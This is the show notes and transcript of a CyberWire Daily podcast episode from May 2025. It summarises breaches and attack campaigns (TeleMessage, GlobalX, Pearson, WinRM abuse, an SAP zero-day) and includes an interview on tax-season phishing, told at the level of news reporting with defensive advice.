CyberWire Daily - Scrutinizing the security of messaging apps continues.
Episode Date: May 9, 2025The messaging app used by CBP and the White House faces continued security scrutiny. Hacktivists breach the airline used for U.S. deportation flights. The FBI warns that threat actors are exploiting o...utdated, unsupported routers. Education giant Pearson confirms a cyberattack. Researchers report exploitation of Windows Remote Management (WinRM) for stealthy lateral movement in Active Directory (AD) environments. A sophisticated email attack campaign uses malicious PDF invoices to deliver a cross-platform RAT. A zero-day vulnerability in SAP NetWeaver enables remote code execution. An Indiana health system reports a data breach affecting nearly 263,000 individuals. Our guest is Alex Cox, Director of Information Security at LastPass, discussing tax-related lures targeting refunds. AI empowers a murder victim to speak from beyond the grave. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Today we are joined by Alex Cox, Director of Information Security at LastPass, to discuss tax-related lures facing both tax preparation agencies and filers expecting refunds. Selected Reading On the state of modern Web Application Security (BrightTalk) Customs and Border Protection Confirms Its Use of Hacked Signal Clone TeleMessage (Wired) Hackers hit deportation airline GlobalX, leak flight manifests, and leave an unsubtle message for "Donnie" Trump (Bitdefender) FBI Sounds Alarm on Rogue Cybercrime Services Targeting Obsolete Routers (infosecurity magazine) Education giant Pearson hit by cyberattack exposing customer data (Bleeping Computer) Hackers Using Windows Remote Management to Stealthily Navigate Active Directory Network (Cybersecurity News) Hackers Weaponizing PDF Invoices to Attack Windows, Linux & macOS Systems (Cybersecurity News) SAP Zero-Day Targeted Since January, Many Sectors Impacted (Security Week) Indiana Health System Notifies 263,000 of Oracle Hack (Bank of Infosecurity) A Judge Accepted AI Video Testimony From a Dead Man (404 Media) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here’s our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the CyberWire Network powered by N2K.
Hey everybody, Dave here.
Join me and my guests, Outpost 24's Laura Enriquez and Michelo Steppa on Tuesday, May
13th at noon Eastern time for a live discussion on the biggest threats hitting web applications
today and what you can do about them. We're going to talk about why attackers still
love web apps in 2025, the latest threat trends shaping the security landscape, how
to spot and prioritize critical vulnerabilities fast, along with scalable
practical steps to strengthen your defenses. Again, the webinar is Tuesday,
May 13th for our live conversation on the state
of modern web application security. You can register now by visiting events.thescyberwire.com.
That's events.thescyberwire.com. We'll see you there.
And now a word from our sponsor, Spy Cloud. Identity is the new battleground, and attackers are exploiting stolen identities to infiltrate
your organization.
Traditional defenses can't keep up.
Spy Cloud's holistic identity threat protection helps security teams uncover and automatically
remediate hidden exposures across your users from breaches, malware, and phishing to neutralize
identity-based threats like account takeover, fraud and ransomware.
Don't let invisible threats compromise your business.
Get your free corporate darknet exposure report at spycloud.com slash cyberwire and see what attackers already know.
That's spycloud.com slash cyberwire.
The messaging app used by CBP and the White House faces continued security scrutiny. Pactivists breach the airline used for US deportation flights.
The FBI warns that threat actors are exploiting outdated, unsupported routers.
Education giant Pearson confirms a cyber attack.
Researchers report exploitation of Windows remote management for stealthy
lateral movement in active directory environments.
A sophisticated email attack campaign uses malicious PDF invoices to deliver a cross-platform rat.
A zero-day vulnerability in SAP NetWeaver enables remote code execution.
An Indiana health system reports a data breach affecting nearly 263,000 individuals.
Our guest is Alex Cox, Director of Information Security
at LastPass, discussing tax-related lures
targeting refunds.
And AI empowers a murder victim to speak from beyond the grave. It's Friday, May 9th, 2025.
I'm Dave Bittner and this is your CyberWire Intel Briefing. Happy Friday and thanks for joining us here today. The US Customs and Border Protection confirmed it uses at least one app from TeleMessage,
a service that clones popular messaging apps like Signal and WhatsApp, but adds archiving
features for compliance.
Following a detected cyber incident, CBP disabled the app.
TeleMessage, now owned by US-based Smarsh, paused all services amid investigations into
multiple security breaches and flaws in its Android app's source code.
A recent photo showed former National Security Advisor
Mike Waltz using the app, appearing to chat with officials,
including Vice President JD Vance.
Senator Ron Wyden has urged the DOJ to investigate,
calling the software a national security risk.
Despite being a federal contractor,
TeleMessages' consumer apps aren't approved under FedRap.
The full scope of government use remains unclear.
Hackedivists claiming ties to Anonymous breached Global X Airlines,
a U.S. government contractor used for deportation flights, stealing flight records, passenger lists, and months of itinerary data.
They defaced the airline's website with a political message and a Guy Fawkes mask image,
criticizing the company's role in deportations.
The hackers contacted journalists and leaked data showing details of flights deporting
hundreds of Venezuelan migrants, some mid-flight while legal challenges were still pending.
According to 404 Media, the hackers accessed
GlobalX's AWS cloud by exploiting a developer token
and retrieving access keys.
They also reportedly sent messages to pilots
using a flight operations tool
and accessed the company's GitHub.
The breach highlights several security lapses.
As of now, neither GlobalX nor U.S. immigration officials have commented.
The FBI has warned that threat actors are exploiting outdated, unsupported routers,
likely from brands like Cisco's Linksys and Ericsson's Cradlepoint, using
unpatched vulnerabilities and remote management software. Hackers bypassed
authentication to gain shell access, installed malware, and turn the devices
into part of a botnet. These compromised routers were then used as proxies via
the AnyProxy and FiveSox networks, helping criminals hide their activities.
Malware communications included a two-way handshake with a command and control server.
While no specific group was named, the FBI noted that Chinese cyber actors have exploited similar vulnerabilities in the past.
Users are urged to replace old routers or disable
remote access. This alert follows the release of OpenEOX, a proposed standard to better
manage end-of-life disclosures for tech products.
UK-based education giant Pearson confirmed a cyberattack in which threat actors stole corporate and consumer
data mostly described as legacy data.
The breach reportedly stemmed from an exposed GitLab personal access token in a public.git
config file, allowing attackers to access source code and embedded cloud credentials.
Over months, they allegedly exfiltrated terabytes of data from AWS, Google
Cloud, and services like Salesforce and Snowflake. Pearson says no employee data was stolen and
is continuing its investigation.
Researchers at Practical Security Analytics report that threat actors are increasingly
exploiting Windows
remote management for stealthy lateral movement in active directory environments.
WinRM, used for legitimate remote administration via PowerShell, becomes a powerful tool for
attackers once they obtain valid credentials through phishing, brute force, or credential
dumping. Using WinRM commands like InvokeCommand,
attackers scan for accessible systems on ports 5985 and 5986,
authenticate remotely, and execute malicious payloads
under normal-looking processes.
Advanced techniques including PowerShell Cradles
and reflective.NET loaders allow payloads to run entirely in memory,
bypassing MC and logging.
The researchers outline a typical attack chain, initial access, reconnaissanceM access, monitoring anomalies, and enhancing
endpoint detection to catch misuse of this native Windows tool.
Researchers at Fortinet have uncovered a sophisticated email attack campaign using malicious PDF
invoices to deliver a cross-platform remote access trojan called RATTI.
While primarily targeting Windows, the malware also affects Linux and Mac OS systems running Java.
The attack starts with deceptive emails that pass SPF validation using the ServicioDeCorreo.es service,
luring victims into clicking buttons in the PDF that launch a multistage infection.
The process uses Dropbox and MediaFire to host files, ngrok tunneling, and geofencing
to evade detection. Victims in Italy receive a Java-based JAR file, while others see harmless
documents fooling email scanners. Once active, RADi enables attackers to execute commands,
log keystrokes, and access webcams and files.
The campaign highlights how attackers combine social engineering
and advanced evasion to bypass security and maintain persistent access.
A critical zero-day vulnerability in SAP NetWeaver has been exploited by threat actors to compromise
hundreds of systems worldwide, enabling remote code execution.
Anapsis and Mandiant began tracking attacks as early as January, with active exploitation
confirmed before SAP issued patches on April 24.
Attackers deployed web shells and executed commands to maintain access,
targeting industries from energy to government.
ANAPSYS warns that attackers possess deep SAP knowledge
and urges immediate patching, compromise assessment, and updated detection measures.
Union Health System in Indiana has reported a data breach affecting nearly 263,000 individuals
linked to a January cyberattack on legacy Cerner systems during a migration to Oracle's
cloud.
The compromised data includes sensitive patient information, such as social security
numbers, medical records, and insurance details. The breach, confirmed by Oracle in March,
did not impact UnionHealth's live systems. Lawsuits allege negligence by both UnionHealth
and Oracle, and claim a threat actor named Andrew is extorting affected hospitals.
Oracle denies a breach of its cloud infrastructure, but acknowledged unauthorized access to outdated
servers.
While Oracle will cover credit monitoring costs, it won't notify individuals directly.
Union Health is offering free credit protection and is facing mounting legal pressure over its handling of the incident.
Coming up after the break, my conversation with Alex Cox, Director of Information Security at LastPass, we're discussing tax-related lures targeting refunds,
and AI empowers a murder victim to speak from beyond the grave.
Stay with us. traditional pen testing is resource intensive slow and expensive providing
only a point-in-time snapshot of your application security leaving it
vulnerable between development cycles automated scanners alone are unreliable
in detecting faults within application logic and critical vulnerabilities.
Outpost24's continuous pen testing as a service solution offers year-round protection,
with recurring manual penetration testing conducted by Crest-certified pen testers,
allowing you to stay ahead of threats and ensure your web applications are always secure.
We've all been there.
You realize your business needs to hire someone yesterday.
How can you find amazing candidates fast?
Well, it's easy.
Just use Indeed.
When it comes to hiring, Indeed is all you need.
Stop struggling to get your job post noticed.
Indeed's Sponsored Jobs helps you stand out and hire fast.
Your post jumps to the top of search results so the right candidates see it first.
And it works.
Sponsored jobs on Indeed get 45% more applications than non-sponsored ones.
One of the things I love about Indeed is how fast it makes hiring.
And yes, we do actually use Indeed for hiring here at N2K Cyberwire.
Many of my colleagues here came to us through Indeed.
Plus, with sponsored jobs there are no subscriptions, no long-term contracts,
you only pay for results. How fast is Indeed? Oh, in the minute or so that I've been talking
to you, 23 hires were made on Indeed, according to Indeed data worldwide. There's no need
to wait any longer, speed up your hiring right now with Indeed. And listeners to this show will get a $75 sponsored job credit to get your jobs more visibility at indeed.com slash cyberwire.
Just go to indeed.com slash cyberwire right now and support our show by saying you heard
about Indeed on this podcast. Indeed.com slash cyberwire. Terms and terms and conditions apply hiring indeed is all you need
our guest is alex cox director of information at LastPass. We're discussing tax-related lures targeting refunds.
So I'm glad we get to catch up here today
because there's a flurry of activity
and I think on people's minds as we come up to tax season,
which of course here in the US is in April.
But then on the other side of that,
I think a lot of times people get their guard down
and you and your colleagues at LastPass are saying, maybe not so fast.
There's still some things that need your attention.
Yeah, yeah, absolutely.
So tax season is just like any other significant time of the year, be it a holiday or some
deadline or what have you.
And what I typically tell people is that the bad guys are entrepreneurial and opportunistic,
so they will use any one of these things as lures to accomplish their goals.
They adapt to current news, they adapt to holiday cycles.
So what we see every year come tax time is, you know, these typical, you know, tax season type attacks.
The thing that's really interesting that sort of developed over the past probably five or
six years is, you know, you've heard this about this move from these smaller kind of
intrusion attempts to what the bad guys are doing now, which is big game hunting, right?
They're going to go for a much bigger firm to attempt to get access to a lot more data.
Over the past five or six years, we've seen that in the tax season area too.
Instead of a bad guy attacking an individual taxpayer, which they still do, they may also
go after a CPA firm or a tax preparation agency or a big online tax company.
The idea there being that I get into that firm, I've got access to a whole bunch of
people rather than just those onesie twosies that I'm targeting individually. So this time of year,
what sort of things are you seeing? Does it have to do with things like refunds? Yeah, I mean, so
if you think about if I'm a tax preparation agency or I'm an individual submitting my tax return or tax
information, that's kind of like an open book to your life, right?
It's got your employer, it's got your address, it's potentially got your relatives, it's
got identifying information about you.
The bad guys can then take that and do what they want to do with it.
They can apply for loans, they can do various fraud.
We've actually seen them get fake tax returns
through the IRS.
So they'll pretend to be used, submit their tax return,
get a tax return, and then off they go with your money.
And then the IRS comes after you and says,
hey, you made a mistake, give us our money back.
So yeah, it's really interesting and kind of varied
the way the bad guys act around this time of year.
And I suppose they're looking for bank account access,
trying to pretend like they need to direct deposit things
and stuff like that?
Yeah, I mean, so if you think about what you can do
with say somebody's social security number
and their banking info and that sort of thing,
they could do everything from social engineer their way
into your bank account, but with that sort of information, they might also be able to social engineer their way into your banking, you know, bank account. But with that sort of information, they might also be able to social engineer their way into an email account or, you know, some online account.
And, you know, what's very common is when you get this, this base source of identity information for a person, the bad guys are good about leveraging that for multiple things.
So it's kind of a, you know, here's one piece of info that's going to get me into a lot of places.
Here's one piece of info that's going to get me into a lot of places.
You know, we are in, I'd say it's fair to say, a bit of a chaotic situation in Washington, DC.
There's a lot of uncertainty with organizations like the IRS. Are the bad guys taking advantage of that uncertainty? Some of the things like layoffs that we've seen with those kinds of agencies?
some of the things like layoffs that we've seen with those kinds of agencies. Yeah, I mean, so anytime you see, you know, a reduction in cybersecurity
capability, the bad guys typically watch the good guys and, you know, they pay
attention to that sort of thing. So I would not be at all surprised to see, you
know, bad guys, you know, looking after that and taking care of that, you know,
taking advantage of that particular situation. The other thing that's playing
a part now is AI and the use of AI with the bad guys.
We see a lot of bad guys doing phishing checks.
Here, I'm going to do this phishing message.
Let me put it into chat GPT and make sure it makes sense because maybe I'm not an English
speaker and I can make it sound like believable English by putting it through chat GPT.
What we see is these messages that people send you
are still very, the bad guys send you are very believable
when it comes to the way that the language is used.
There are still some technical means to detect
if they're good or bad, but the use of English language
because of AI has gotten much, much better.
So suppose I'm the security professional at my organization, and I want to go down the
hall and talk to my chief financial officer, maybe some folks in HR who are taking care
of payroll or those kinds of things.
What sort of topics should I be bringing up with them for them to have on their radar?
Yeah, I mean, so what I always tell people is, you know, be suspicious, right?
When you get that text message that says, hey, this is the IRS, you know, you owe us
money, look a little closer at it, right?
So I'll give you an example.
I had a friend send me one this morning and she said, hey, is this, you know, is this
phishing?
And I looked at it and it was very believable from the USPS, you know, apparently.
But the domain was a.cc domain. So, you know,
.cc is Cocos Island in Australia. The IRS or USPS is probably not going to use that infrastructure.
You know, they're probably going to use a.com or.us or something in the US.
Right. You know, so being kind of suspicious there. The other thing I tell people is,
you know, especially when it comes to tax information, if the IRS wants to get ahold of you,
they're gonna do so in many different ways, right?
So maybe you will get a text message, you know,
at some point, because you do get text messages
that say, hey, your federal return has been accepted.
If you go to the IRS website,
you'll also see your tax info there, right?
If you look in your mailbox,
you probably will get a letter from the IRS as well.
So it's one of those like,
okay, here's the single point of info.
Let me see if I can verify it in other places.
But yeah, I think largely just being very suspicious,
as to any single point of information
that you just sort of suddenly get out of nowhere,
be suspicious of it.
Just going broader now,
folks like you and your colleagues there at LastPass
who are in the password manager business, what
part do offerings like yours play in this?
Not just the ones that you do, but your competitors, what sort of safety and mitigations do people
enjoy from having that extra layer?
Yeah, so really I think the most important thing with a password manager is that you're
able to create unique passwords for each site that you use.
And the reason that's important is when the bad guys get a hold of, you know, say a trove of username and passwords, you know, they'll take Alex.cox at whatever and password fluffy.
And they'll try that in 50, 100 different sites to see if you've reused that same password over and over again.
So when you use a password manager and you're creating those individual complex passwords,
if the bad guys get a hold of one of those, they just have access to one site.
They don't have access to everything.
So that's the main advantage for me is that here I can create this unique password for
every single site.
I don't have to remember them.
They'd be very hard to guess and it just kind of increases your security that way.
The other thing I'll add is something I've noticed is that
it can catch if I'm at a look-alike site.
I'll say, hey, I want to log in here, and it'll say, wait a minute, that's not...
We're not actually at Microsoft. We're not actually at Facebook or wherever else.
So hang on there.
Yeah, there are varying ways to approach that problem.
One of the things that we do in LastPass
is if you're going to paste your information
into someplace that LastPass hasn't seen before,
it'll actually pop up with a little note that says,
you're about to paste some info into the site.
Are you sure you want to do that?
So it gives you that little bit of security,
that little bit of second check
to make sure you're doing what you intend to do.
But yeah, absolutely, being able to detect those sites
that aren't actually the sites that you have in your vaults
is a pretty important feature. Let's be real, navigating security compliance can feel like assembling Ikea furniture without
the instructions.
You know you need it, but it takes forever and you're never quite sure if you've done
it right.
That's where Vanta comes in.
Vanta is a trust management platform
that automates up to 90% of the work for frameworks
like SOC 2, ISO 27001, and HIPAA,
getting you audit ready in weeks, not months.
Whether you're a founder, an engineer,
or managing IT and security for the first time,
Vanta helps you prove your security posture
without taking over your life. More
than 10,000 companies, including names like Atlassian and Quora, trust Vanta to monitor
compliance, streamline risk, and speed up security reviews by up to five times. And
the ROI? A recent IDC report found Vanta saves businesses over half a million dollars a year
and pays for itself in just three months.
For a limited time, you can get a thousand dollars off Vanta at vanta.com slash cyber.
That's vanta.com slash cyber. And finally, our Speaking from Beyond the Grave desk tells us of the story of an Arizona
courtroom that just heard from a murder victim, but not in the usual way. Christopher
Pelkey was shot and killed in a 2021 road rage incident. At the
sentencing, an AI-generated version of him took the stand. That's
right, his sister built an avatar using AI and voice cloning tools.
It looked and sounded like Chris, and it spoke directly
to the man who killed him. The Avatar forgave the shooter. It said they could have been
friends.
The judge was moved. The defense even quoted the Avatar. The family said their goal was
to bring Chris back, to humanize him. And it worked.
No one objected.
It was all labeled as AI.
Still, it raises big questions.
Tech gave a voice to the dead, and that voice helped decide a sentence.
As powerful as this moment was, we should tread carefully before letting digital ghosts shape real-world justice.
And that's the CyberWire. For links to all of today's stories, check out our daily briefing
at this cyberwire.com.
A quick program note, you can join me for a live webinar Tuesday, May 13th. It's titled
On the State of Modern Web Application Security. Join me and Outpost 24's Laura Enriquez and Michelo Steppa on May 13th, 12 p.m. Eastern Time for this live webinar that dives into the biggest threats hitting how to spot and prioritize critical vulnerabilities fast,
along with scalable practical steps to strengthen your defenses.
Again, the webinar is titled On the State of Modern Web Application Security,
Tuesday at noon Eastern time.
We'll have a link to register in the show notes.
Be sure to check out this weekend's research Saturday,
and my conversation
with Lucia Valentich from Reversing Labs. The research is titled Atomic and Exodus Crypto Wallets
Targeted in Malicious NPM Campaign. That's Research Saturday. Check it out. We'd love to know what you
think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead
in the rapidly changing world of cybersecurity. If you like our show, please share a rating
and review in your favorite podcast app. Please also fill out the survey in the show notes
or send an email to cyberwire at n2k.com. N2K's senior producer is Alice Carruth, our
cyberwire producer is Liz Stokes. We're mixed by Trey Hester with original music and sound design by Elliot Peltzman.
Our executive producer is Jennifer Iben, Peter Kilpe as our publisher, and I'm Dave Fittner.
Thanks for listening.
We'll see you back here, next week. What's the common denominator in security incidents?
Escalations and lateral movement.
When a privileged account is compromised, attackers can seize control of critical assets.
With bad directory hygiene and years of technical debt, identity attack paths are easy targets
for threat actors to exploit, but hard for defenders
to detect. This poses risk in active directory, Entra ID, and hybrid configurations. Identity
leaders are reducing such risks with attack path management. You can learn how attack path
management is connecting identity and security teams while reducing risk with Bloodhound Enterprise,
powered by SpectorOps.
Head to spectorops.io today to learn more.
SpectorOps. See your attack paths the way adversaries do.